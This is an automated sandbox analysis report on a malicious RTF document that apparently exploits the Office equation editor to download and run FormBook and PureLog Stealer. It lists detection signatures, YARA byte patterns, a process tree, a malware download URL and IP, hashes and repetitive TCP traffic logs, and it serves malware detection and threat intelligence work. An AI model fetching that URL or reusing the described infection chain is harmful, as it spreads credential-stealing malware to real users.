Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DzokrPQPdy.rtf

Overview

General Information

Sample name:DzokrPQPdy.rtf
renamed because original name is a hash value
Original sample name:0a9c028203a8416be8db7371550d0fb5.rtf
Analysis ID:1483003
MD5:0a9c028203a8416be8db7371550d0fb5
SHA1:2f576cdfbf4f60918676f6583265c504bdeefa21
SHA256:a424c4312f97747efa22a627aa0c77c4f11022d171e11d3eeff00dd77b737520
Tags:rtf
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 980 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2344 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • winiti.exe (PID: 3124 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
        • winiti.exe (PID: 3192 cmdline: "C:\Users\user\AppData\Roaming\winiti.exe" MD5: 1F5C95D40C06C01300F0A6592945A72D)
    • EQNEDT32.EXE (PID: 3268 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
DzokrPQPdy.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xf74:$obj2: \objdata
  • 0xf60:$obj3: \objupdate
  • 0xf3b:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1447f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.366993516.0000000000240000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Click to see the 1 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.winiti.exe.240000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          5.2.winiti.exe.240000.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            5.2.winiti.exe.253505c.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              6.2.winiti.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                6.2.winiti.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
                • 0x2ec33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
                • 0x176e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
                Click to see the 3 entries

                Sigma Signatures

                Exploits

                barindex
                Sigma detected: EQNEDT32.EXE connecting to internet
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.219.239.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                Sigma detected: File Dropped By EQNEDT32EXE
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2344, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe

                System Summary

                barindex
                Sigma detected: Equation Editor Network Connection
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2344, Protocol: tcp, SourceIp: 104.219.239.104, SourceIsIpv6: false, SourcePort: 80
                Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3124, ProcessName: winiti.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\winiti.exe, NewProcessName: C:\Users\user\AppData\Roaming\winiti.exe, OriginalFileName: C:\Users\user\AppData\Roaming\winiti.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2344, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\winiti.exe" , ProcessId: 3124, ProcessName: winiti.exe
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2344, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 980, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-26T13:43:07.323801+0200
                SID:2022050
                Source Port:80
                Destination Port:49163
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-26T13:43:07.504654+0200
                SID:2022051
                Source Port:80
                Destination Port:49163
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: DzokrPQPdy.rtfAvira: detected
                Antivirus detection for URL or domain
                Source: http://104.219.239.104/80/winiti.exeAvira URL Cloud: Label: malware
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\winiti.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJoe Sandbox ML: detected

                Exploits

                barindex
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.219.239.104 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exeJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: amWV.pdb source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
                Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
                Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: amWV.pdbSHA256H! source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
